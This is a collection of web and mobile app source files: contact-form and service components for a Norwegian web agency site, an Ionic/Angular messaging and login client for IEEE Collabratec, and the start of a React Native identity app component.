<file_sep>/app/components/services.js
module.exports = async function($) {
return /* html */ `
<div class="full-width border-row pale-background">
<div class="tjenester inner-width-wide">
<div class="row">
<div class="col col-12 title-space">
<h2>${ $.t('index_tjenester_tittel') }</h2>
<hr style="width:4%; margin-top: -12px; margin-left: 4em;">
<p>${ $.t('index_tjenester') }</p>
</div>
</div>
<div class="row gutters paragraph">
<a href="${ $.link('design-utvikling') }" class="col col-4 service-card light-background">
<div class="circle">
<img class="img-circle" src="/img/design-icon.svg" alt="design icon">
</div>
<div class="service-text">
<h3>${ $.t('index_design_tittel') }</h3>
<p>${ $.t('index_design') }</p>
<span>${ $.t('index_les_mer') }</span>
</div>
</a>
<a href="${ $.link('seo-marketing') }" class="col col-4 service-card light-background">
<div class="circle">
<img class="img-circle" src="/img/seo-icon.svg" alt="seo icon">
</div>
<div class="service-text">
<h3>${ $.t('index_seo_tittel') }</h3>
<p>${ $.t('index_seo') }</p>
<span>${ $.t('index_les_mer') }</span>
</div>
</a>
<a href="${ $.link('hosting-drift') }" class="col col-4 service-card light-background">
<div class="circle">
<img class="img-circle" src="/img/hosting-icon.svg" alt="hosting icon">
</div>
<div class="service-text">
<h3>${ $.t('index_hosting_tittel') }</h3>
<p>${ $.t('index_hosting') }</p>
<span>${ $.t('index_les_mer') }</span>
</div>
</a>
</div>
</div>
</div>
`
}<file_sep>/app/components/contact.js
const subjects = ['price', 'questions', 'marketing', 'design', 'hosting', 'other']
module.exports = async function($) {
// Methods
function clearField(el) {
var field = q('span.form-error', el.parentNode)
text(field, '')
}
async function sendEmail(form) {
var button = q('.form-button')
button.disabled = true
// Sleep:
await new Promise(r => setTimeout(r, 500))
var values = serialize(form)
const result = await api({ action: 'contact/create', values })
if (result.error) {
css('.message.error', 'opacity: 1')
window.location = '#kontakt'
if (result.values) {
Object.keys(result.values).forEach(function(key) {
text(`.${key}-error`, result.values[key].join(', '))
})
}
button.disabled = false
} else {
form.reset()
window.location = $.link('bekreftelse')
}
}
// Components
function renderSubjectOptions() {
return subjects.map(function(subject) {
var value = $.t(`subjects_${ subject }`)
var selected = $.query.subject && subject === $.query.subject ? 'selected' : ''
return `<option value="${ subject }" ${ selected }>${ value }</option>`
}).join('')
}
return /* html */`
<div class="full-width border-row pale-background">
<div class="contact-form inner-width-wide">
<div class="row gutters">
<div class="col col-4 ta-kontakt" id="kontakt">
<h2>${ $.t('index_kontakt_tittel') }</h2>
<hr style="width:10%; margin-top: -12px; margin-left: 3em; padding-bottom: 1rem;">
<p>${ $.t('index_kontakt1') }</p>
<p>${ $.t('index_kontakt2') }</p><br>
<p>
<img class="icon" src="/img/envelope.svg" alt="Email icon"><a href="mailto:<EMAIL>"><EMAIL></a>
</p>
<p>
<img class="icon" src="/img/place.svg" alt="Address icon"> Oslo, ${ $.t('index_nor') }
</p>
</div>
<div class="col col-8">
<div class="message error">
${ $.t('correct_errors') }
<span class="close small" onclick="this.parentNode.style.display='none'"></span>
</div>
<form action="${ $.link('index') }" method="post" class="form" autocomplete="off" onsubmit="sendEmail(this); return false">
<div class="row gutters">
<div class="col col-6">
<div class="form-item">
<label for="input-name">${ $.t('index_kontakt_form1') }<span class="req">*</span></label>
<input id="input-name" type="text" name="name" placeholder="<NAME>" onfocus="clearField(this)">
<span class="form-error name-error error-message"></span>
</div>
</div>
<div class="col col-6">
<div class="form-item">
<label for="input-phone">${ $.t('index_kontakt_form2') }</label>
<input id="input-phone" type="text" name="phone" placeholder="22222222" onfocus="clearField(this)">
<span class="form-error phone-error error-message"></span>
</div>
</div>
</div>
<div class="row gutters">
<div class="col col-6">
<div class="form-item">
<label for="input-email">${ $.t('index_kontakt_form3') }<span class="req">*</span></label>
<input id="input-email" type="text" name="email" placeholder="<EMAIL>" onfocus="clearField(this)">
<span class="form-error email-error error-message"></span>
</div>
</div>
<div class="col col-6">
<div class="form-item">
<label for="input-option">${ $.t('index_kontakt_form4') }<span class="req">*</span></label>
<select id="input-option" name="subject" onfocus="clearField(this)">
<option value="">---</option>
${ renderSubjectOptions() }
</select>
<span class="form-error subject-error error-message"></span>
</div>
</div>
</div>
<div class="form-item">
<label for="input-message">${ $.t('index_kontakt_form5') }</label>
<textarea id="input-message" rows="6" name="message" placeholder="${ $.t('index_kontakt_form_write') }" onfocus="clearField(this)"></textarea>
<span class="form-error message-error error-message"></span>
</div>
<div class="form-item">
<button class="form-button w100 button-style">
<span>Send</span>
<img class="loader" src="/img/loader.svg">
</button>
</div>
</form>
</div>
</div>
</div>
</div>
<script>${ sendEmail };${ clearField }</script>
`
}<file_sep>/app/layouts/mail.js
module.exports = async function(mail, $, data) {
console.log(mail)
return /* html */`
<!doctype html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>${ mail.subject || 'Speria kontakt' }</title>
<style>
body {
background-color: white;
}
</style>
</head>
<body>
<div class="content">${ mail.content }</div>
</body>
</html>
`
}
| 9ad2a3119c207453a274385515b05b0df8730244 | ["JavaScript", "Markdown"] | 13 | JavaScript | suspha/speria-creative | cbbecdd4dc63a605b8e1583e368b5228ed0c7603 | 6c645057090af6a34dea1376e2a20f7122a8f97a | refs/heads/master |
<file_sep>// Imports
import { Injectable } from '@angular/core';
import { Http, Response, Headers, RequestOptions } from '@angular/http';
import { Observable } from 'rxjs/Observable';
// Import RxJs required methods
import 'rxjs/add/operator/map';
import 'rxjs/add/operator/catch';
import 'rxjs/add/operator/toPromise';
import 'rxjs/add/observable/throw'
@Injectable()
export class MessageService {
// Resolve HTTP using the constructor
constructor (private http: Http) {}
// private instance variable to hold base url
private messageUrl = 'https://ieee-collabratecapi.ieee.org/v1/';
public messageContainer:any = {};
getMessages(tokenObject):Observable<any>{
//console.log('tokenObject is:'+JSON.stringify(tokenObject));
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let startThread = 0;
let fetchFirstThread = false;
let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
console.log('authdata value:'+authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
let getmessageapi = this.messageUrl+'message/getAllMessages';
return this.http.post(getmessageapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
getYourConnections(key,pageno,pagelimit,val1,val2,val3,val4,val5,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
    //this.messageUrl = this.messageUrl+'connections/connect/search?'+'key='+key+'&page='+pageno+'&items='+pagelimit+'&society='+val1+'&section='+val2+'&location='+val3+'&myMentors='+val4+'&myMentees='+val5+'&custKey='+'';
    let getconnectionsapi = this.messageUrl+'connections/connect/search?'+'key='+key+'&page='+pageno+'&items='+pagelimit+'&society='+val1+'&section='+val2+'&location='+val3+'&myMentors='+val4+'&myMentees='+val5+'&custKey='+'';
return this.http.get(getconnectionsapi,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
set MessageContainer(infoarray){
// this.messageContainer = {};
// this.messageContainer.msgTitleText = msgTitleText;
// this.messageContainer.encSelList = encSelList;
console.log('inforarray is:'+infoarray);
this.messageContainer = {};
this.messageContainer.msgTitleText = infoarray[0];
this.messageContainer.encSelList = infoarray[1];
}
get getMessageContainer() {
return this.messageContainer;
}
getMessageThread(msgId,messageTimeStamp, timeStampDirection,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = messageTimeStamp ? (timeStampDirection === 'oldest' ? {
'msgId': msgId,
'oldestMessageTimeStamp': messageTimeStamp
} : {
'msgId': msgId,
'latestMessageTimeStamp': messageTimeStamp
}) : {
'msgId': msgId
};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'getMessageThread';
let messagethreadapi = this.messageUrl+'message/'+'getMessageThread';
return this.http.post(messagethreadapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
sendMessage(messagetext,autolinkerlist,encSelList,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = {"desc":messagetext,'autoLinkerList':autolinkerlist,"encSelList":encSelList};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'sendMessage';
let sendmessageapi = this.messageUrl+'message/'+'sendMessage';
return this.http.post(sendmessageapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
replyMessage(messagetext,autolinkerlist,messageid,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = {"desc":messagetext,'autoLinkerList':autolinkerlist,"msgId":messageid};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'replyMessage';
let replymessageapi = this.messageUrl+'message/'+'replyMessage';
return this.http.post(replymessageapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
getMessageParticipants(msgId,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = {'msgId': msgId};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'replyMessage';
let getparticipantsapi = this.messageUrl+'message/'+'getMessageParticipants';
return this.http.post(getparticipantsapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
private extractData(res:Response) {
//console.log('response is following'+JSON.stringify(res));
let body = res.json();
return body || [];
}
private handleError(error:any) {
// In a real world app, we might use a remote logging infrastructure
// We'd also dig deeper into the error to get a better message
//console.log('error is'+JSON.stringify(error));
let errMsg = (error.message) ? error.message :
error.status ? `${error.status} - ${error.statusText}` : 'Server error';
console.error(errMsg); // log to console instead
return Observable.throw(errMsg);
}
}<file_sep>import { Component } from '@angular/core';
import { NavController, NavParams } from 'ionic-angular';
import { AuthService } from '../../services/auth.service';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { HomePage } from '../home/home';
@Component({
selector: 'page-auth',
templateUrl: 'auth.html',
providers:[AuthService]
})
export class AuthPage{
username:string = '';
password:string = '';
errormessage:string = '';
mode:'Observable';
constructor(public navCtrl: NavController,public navParams: NavParams,private authService:AuthService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController) {
this.username = '<EMAIL>';
this.password = '<PASSWORD>';
}
private response:any = [];
private errorMessage:any = '';
Authenticate(){
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
if(this.username == '' || this.password == ''){
let alert = this.alertCtrl.create({
title: 'Login',
subTitle: "Please enter username and password to login",
buttons: ['OK']
});
alert.present();
}else{
this.authService.authenticateUser(this.username,this.password).subscribe(
response => {
// Emit list event
console.log('payload is following:'+response);
this.navCtrl.setRoot(HomePage);
this.nativeStorage.setItem('AuthResponse', {property: response})
.then(
() => console.log('Stored item!'),
error => console.error('Error storing item', error)
);
},
err => {
let alert = this.alertCtrl.create({
title: 'Authentication Failed',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}
}
}
<file_sep>import { Component, OnInit, ViewEncapsulation ,ViewChild} from '@angular/core';
import { ModalController,NavController, Nav,NavParams} from 'ionic-angular';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { ModalContentPage } from '../message-modal/message-modal';
import { MessageService } from '../../services/message.service';
import { ChatPage } from '../../pages/message/chat/chat';
import * as _ from 'underscore/underscore';
@Component({
selector: 'page-message',
templateUrl: 'message.html',
providers:[MessageService]
})
export class MessagePage implements OnInit{
@ViewChild(Nav) nav: Nav;
public messages:any = [];
public siebCustId:any = '';
public targetPeople:any = [];
private response:any = [];
private errorMessage:any = '';
constructor(public navCtrl: NavController,public navParams: NavParams,private messageService:MessageService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController,public modalCtrl: ModalController) { }
refreshPage(refresher){
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.siebCustId = data.property['auth-data'].siebcustid;
this.messageService.getMessages(data).subscribe(
response => {
refresher.complete();
let smData = response.data;
this.messages = smData.hits;
this.targetPeople = smData.targetPeople;
this.targetPeople = this.targetPeople.length === 0 ? this.targetPeople : _.uniq(this.targetPeople, function (e) {
return e.siebelNr;
});
this.populateChatParticipantLabel(this.siebCustId);
},
err => {
refresher.complete();
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
ngOnInit(){
//this.nav.setRoot(MessagePage);
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.siebCustId = data.property['auth-data'].siebcustid;
this.messageService.getMessages(data).subscribe(
response => {
let smData = response.data;
this.messages = smData.hits;
this.targetPeople = smData.targetPeople;
this.targetPeople = this.targetPeople.length === 0 ? this.targetPeople : _.uniq(this.targetPeople, function (e) {
return e.siebelNr;
});
this.populateChatParticipantLabel(this.siebCustId);
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
populateChatParticipantLabel(siebelno) {
let targetpeople = this.targetPeople;
_(this.messages).each(function (msg) {
msg.targetIdsCopy = _.clone(msg.targetIds); // Get All Target Ids
if (!_.includes(msg.targetIdsCopy, msg.ownerList[0].siebelNr)) {
msg.targetIdsCopy.unshift(msg.ownerList[0].siebelNr); // Add msg Owner
}
msg.targetIdsCopy = msg.targetIdsCopy.filter(function (e) {
return e != siebelno; // Remove myself
});
msg.chatParticipants = msg.targetIdsCopy
.map(function (target) {
return _.find(targetpeople, function (o) {
return o.siebelNr === target;
});
});
if (msg.chatParticipants[0].pictureUrl === '/assets/img/default-profile-picture.gif') {
msg.chatParticipants[0].pictureUrl = 'assets/img/icons/user-default-x3.png';
}
msg.cpLength = msg.chatParticipants.length;
if (msg.cpLength === 1) {
msg.chatParticipantLabel = msg.chatParticipants[0].fullName;
} else {
if (msg.cpLength <= 3)
msg.chatParticipantLabel = msg.chatParticipants.map(function (cp) {
if (cp === undefined) {
console.error(' cp is undefined in populateChatParticipantLabel : ' + JSON.stringify(msg.chatParticipants));
return '';
}
return cp.fullName.split(' ')[0];
}).join(', ');
else {
msg.chatParticipantLabel = msg.chatParticipants.map(function (cp) {
if (cp === undefined) {
//console.log(JSON.stringify(msg.chatParticipants));
return '';
}
return cp.fullName.split(' ')[0];
}).slice(0, 3).join(', ') + ' and ' + (msg.cpLength - 3) + ' other' + (msg.cpLength > 4 ? 's' : '');
}
}
});
}
openMessageModal(){
// let modal = this.modalCtrl.create(ModalContentPage);
// modal.present;
// this.nav.push(ModalContentPage);
this.navCtrl.push(ModalContentPage);
}
viewMessage(item){
console.log('item is following:'+JSON.stringify(item));
let chatparticipantsarray;
chatparticipantsarray = item.chatParticipants;
chatparticipantsarray = chatparticipantsarray.map(function (conn) {
return conn.encSiebelNr;
});
    console.log('encSiebelNr values are ' + chatparticipantsarray);
this.navCtrl.push(ChatPage,{"stateParamId":item.msgId,"encsiebelvalue":chatparticipantsarray,'chatparticipants':chatparticipantsarray});
}
}
<file_sep>import { Component, OnInit, ViewEncapsulation ,ViewChild} from '@angular/core';
import { ModalController,NavController, Nav,NavParams} from 'ionic-angular';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { MessageService } from '../../../services/message.service';
import * as _ from 'underscore/underscore';
@Component({
selector: 'page-chat',
templateUrl: 'chat.html',
providers:[MessageService]
})
export class ChatPage implements OnInit{
private paramid:string = '';
public messageContainer:any = {};
public chatParticipantLabel:string = '';
public encsiebleid:any;
//public timestampdirection:any = 0;
private response:any = [];
private errorMessage:any = '';
public userInfo = {};
public messages = [];
public participants = [];
public startRecord = 0;
public messageLoaded = false;
public msgId = '';
public newMessage = {
message: '',
attachedImages: [],
autoLinkerList:[]
};
public oldestMessageTimeStamp = 0;
public latestMessageTimeStamp = 0;
constructor(public navCtrl: NavController,public navParams: NavParams,private messageService:MessageService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController,public modalCtrl: ModalController) {
this.paramid = navParams.get('stateParamId');
this.chatParticipantLabel = navParams.get('Titletoshow');
this.encsiebleid = navParams.get('encsiebelvalue');
this.participants = navParams.get('chatparticipants');
    console.log('paramid value here ' + this.paramid);
    console.log('encsiebel value here ' + this.encsiebleid);
if(this.paramid == '' || this.paramid == undefined){
this.messageContainer.msgtitle = this.chatParticipantLabel;
this.messageContainer.encsibleidvalue = this.encsiebleid;
}
// else if( this.encsiebleid != null && this.encsiebleid!=undefined){
// this.messageContainer.encsibleidvalue = this.encsiebleid;
// }
}
doRefresh(refresher) {
//console.log('Begin async operation', refresher);
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.messageService.getMessageThread(this.paramid,this.oldestMessageTimeStamp,'oldest',data).subscribe(
response => {
refresher.complete();
console.log('response data'+JSON.stringify(response.data.messageThread));
if (response.data.messageThread !== null) {
this.messages = this.messages.concat(response.data.messageThread);
console.log('messages are'+this.messages);
if (response.data.messageThread.length > 0)
this.oldestMessageTimeStamp = response.data.messageThread[response.data.messageThread.length - 1].updatets;
            _(this.messages).forEach((val) => {
              // Arrow function keeps `this` bound to the component so this.participants is reachable
              let author = _.find(this.participants, (o) => {
                return o.siebelNr === val.author.siebelNr;
              });
              if (author) {
                val.author.imageUrl = author.pictureUrl;
              }
            });
}
},
err => {
refresher.complete();
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
ngOnInit(){
//console.log('navparamid is:'+this.paramid);
if(this.paramid == undefined || this.paramid == ''){
// this.messageContainer = this.messageService.getMessageContainer();
// console.log('message contaniner'+JSON.stringify(this.messageContainer));
}else{
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.messageService.getMessageThread(this.paramid,'','',data).subscribe(
response => {
if (response.data.messageThread.length > 0) {
this.latestMessageTimeStamp = response.data.messageThread[0].updatets;
this.oldestMessageTimeStamp = response.data.messageThread[response.data.messageThread.length - 1].updatets;
}
this.messages = response.data.messageThread;
this.messageService.getMessageParticipants(this.paramid,data).subscribe(
response => {
this.participants = response.data.targetPeople;
if (this.participants.length <= 3) {
this.chatParticipantLabel = this.participants.map(function(cp) {
if (cp === undefined)
{
return '';
}
return cp.firstName;
}).join(', ');
} else {
this.chatParticipantLabel = this.participants.map(function(cp) {
if (cp === undefined)
{
return '';
}
return cp.firstName;
}).slice(0, 3).join(', ') + ' and ' + (this.participants.length - 3) + ' other' + (this.participants.length > 4 ? 's' : '');
}
              _(this.messages).forEach((val) => {
                // Arrow function keeps `this` bound to the component so this.participants is reachable
                let author = _.find(this.participants, (o) => {
                  return o.siebelNr === val.author.siebelNr;
                });
                if (author) {
                  val.author.imageUrl = author.pictureUrl;
                }
              });
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
}
replyMessage(messageText){
    if (messageText === '')
      return;
messageText = this.newMessage.message;
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
messageText = messageText.replace(/ /g, ' ');
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
console.log('messageContainer'+JSON.stringify(this.messageContainer));
if(Object.keys(this.messageContainer).length>0){
this.messageService.sendMessage(messageText,this.newMessage.message['autolinkerlist'],this.messageContainer.encsibleidvalue,data).subscribe(
response => {
//console.log('response is:'+JSON.stringify(response));
this.paramid = response.data.messageVO.msgId;
            if (this.paramid != '' && this.paramid != undefined) {
this.messageContainer = {};
}
setTimeout (() => {
this.newMessage.message = '';
messageText = '';
this.newMessage.autoLinkerList = [];
}, 500)
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}else{
this.messageService.replyMessage(messageText,this.newMessage.message['autolinkerlist'],this.paramid,data).subscribe(
response => {
console.log('reply response is achieved:');
this.newMessage.message = '';
messageText = '';
this.newMessage.autoLinkerList = [];
setTimeout(() => {
console.log('latest timestamp is:'+this.latestMessageTimeStamp);
this.messageService.getMessageThread(this.paramid,this.latestMessageTimeStamp,'latest',data).subscribe(
response => {
console.log('latest response is:'+JSON.stringify(response));
if (response.data.messageThread !== null) {
this.messages = this.messages.concat(response.data.messageThread);
if (response.data.messageThread.length > 0)
this.latestMessageTimeStamp = response.data.messageThread[0].updatets;
                  _(this.messages).forEach((val) => {
                    // Arrow function keeps `this` bound to the component so this.participants is reachable
                    let author = _.find(this.participants, (o) => {
                      return o.siebelNr === val.author.siebelNr;
                    });
                    if (author) {
                      val.author.imageUrl = author.pictureUrl;
                    }
                  });
}
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}, 500);
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}
},
error => console.error(error)
);
}
}<file_sep>// Imports
import { Injectable } from '@angular/core';
import { Http, Response, Headers, RequestOptions } from '@angular/http';
import { Observable } from 'rxjs/Observable';
// Import RxJs required methods
import 'rxjs/add/operator/map';
import 'rxjs/add/operator/catch';
import 'rxjs/add/operator/toPromise';
import 'rxjs/add/observable/throw'
@Injectable()
export class AuthService {
// Resolve HTTP using the constructor
constructor (private http: Http) {}
// private instance variable to hold base url
private authUrl = 'https://mobileauthqa.ieee.org/v1/auth/IEEE-Collabratec';
authenticateUser(usernamevalue,passwordvalue):Observable<any>{
//let payload = {username:usernamevalue,password:<PASSWORD>};
let payload = "username="+usernamevalue+"&password="+<PASSWORD>;
let headers = new Headers({'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8','Origin':'https://mobileauthqa.ieee.org','Referer':'https://mobileauthqa.ieee.org/','Accept':'*' }); // ... Set content type to JSON
//console.log('payload is'+payload);
let options = new RequestOptions({ headers: headers}); // Create a request option
return this.http.post(this.authUrl,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
private extractData(res:Response) {
let body = res.json();
return body || [];
}
private handleError(error:any) {
// In a real world app, we might use a remote logging infrastructure
// We'd also dig deeper into the error to get a better message
//console.log('error is'+JSON.stringify(error));
let errMsg = (error.message) ? error.message :
error.status ? `${error.status} - ${error.statusText}` : 'Server error';
console.error(errMsg); // log to console instead
return Observable.throw(errMsg);
}
}<file_sep>import { Component, OnInit, ViewEncapsulation } from '@angular/core';
import { ModalController,NavController } from 'ionic-angular';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { MessageService } from '../../services/message.service';
import { ChatPage } from '../../pages/message/chat/chat';
import * as _ from 'underscore/underscore';
@Component({
selector:'page-content-modal',
templateUrl:'message-modal.html',
providers:[MessageService]
})
export class ModalContentPage{
public connections:any = [];
private response:any = [];
private errorMessage:any = '';
public selectedConnections:any = [];
private connectiondatalist:any = [];
public confirmed:boolean = false;
public firstname:string = '';
//private preparedConnections:any = [];
constructor(public navCtrl: NavController,private messageService:MessageService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController,public modalCtrl: ModalController) {
}
ngOnInit(){
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
let key = '';
let pageno = 1;
let preparedConnections = [];
this.firstname = data.property['auth-data'].givenName;
console.log('fistname'+this.firstname);
this.messageService.getYourConnections(key,pageno,10,'N', 'N', 'N', 'N', 'N',data).subscribe(
response => {
this.connections = response.data.connectionList;
let connectionsvalue = this.selectedConnections;
if (this.connections !== null) {
preparedConnections = this.connections.map(function (item) {
var isSelected = _.some(connectionsvalue, { 'encSiebelNr': item.encSiebelNr });
return {
'name': item.fullName,
'firstName': item.firstName,
'imageUrl': item.pictureUrl,
'encSiebelNr': item.encSiebelNr,
'checked': isSelected
};
});
}
//console.log('prepared connections:'+JSON.stringify(preparedConnections));
this.connections = preparedConnections;
this.connectiondatalist = preparedConnections;
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
getItems(ev:any){
// set val to the value of the searchbar
this.connections = this.connectiondatalist;
let val = ev.target.value;
// if the value is an empty string don't filter the items
if (val && val.trim() != '') {
this.connections = this.connections.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
}
}
addToSelected(item){
let checkboxvalue = this.confirmed;
    if (!item.checked) {
      // Remove the deselected connection by the index where it was found
      for (let i = 0; i < this.selectedConnections.length; i++) {
        if (this.selectedConnections[i].encSiebelNr === item.encSiebelNr) {
          this.selectedConnections.splice(i, 1);
          break;
        }
      }
    } else {
      this.selectedConnections.push(item);
    }
}
createNew(){
let participants =
this.selectedConnections.map(function (conn) {
return conn.firstName;
});
//console.log('this firstname :'+this.firstname);
participants.push(this.firstname);
let msgTitle = participants.join(', ');
// let titleencarray = [];
// this.messageService.(msgTitle,
//console.log('this selected are:'+JSON.stringify(this.selectedConnections));
let encsiebel = this.selectedConnections.map(function (conn) {
return conn.encSiebelNr;
});
// titleencarray.push(encsiebel);
// titleencarray.push(msgTitle);
//console.log('participants are:'+participants);
this.navCtrl.push(ChatPage,{'Titletoshow':msgTitle,'encsiebelvalue':encsiebel,'stateParamId':''});
}
}
|
aa90b595dc889b6f47417a7b355913c51032ad18
|
[
"TypeScript"
] | 6
|
TypeScript
|
mobigaurav/Ionic2
|
09d7b4f9da60190f0b767979885077bac8db15fc
|
bc02364714ac78416049ad7c31610254a7acb440
|
refs/heads/master
|
<file_sep>import React, { useRef, useEffect, useState } from "react";
import { Animated, Text, View, Image, StyleSheet } from "react-native";
import {
Card,
ListItem,
Button,
// Icon,
Tile,
Overlay,
Avatar,
Divider,
} from "react-native-elements";
import QRCode from 'react-native-qrcode-svg';
import AsyncStorage from "@react-native-async-storage/async-storage";
import { ScrollView } from "react-native-gesture-handler";
import { AppLoading } from "expo";
import { useFonts } from "expo-font";
import { sha256 } from "react-native-sha256";
import Icon from "react-native-vector-icons/FontAwesome5";
// import RNLocation from 'react-native-location';
import * as Location from 'expo-location';
export default ({ navigation }) => {
const [seed, setSeed] = useState("");
const [seedInfo, setSeedInfo] = useState("");
const [iAddress, setIAddress] = useState("");
const [location, setLocation] = useState([0,0]);
const [fname, setFname] = useState("");
const [sname, setSname] = useState("");
const [email, setEmail] = useState("");
const [password, setPassword] = useState("");
const [dob, setDOB] = useState("");
const [idnum, setIDnum] = useState("");
// const [placeofbirth, setPlaceOfBirth] = useState("");
// const [nationality, setNationality] = useState("");
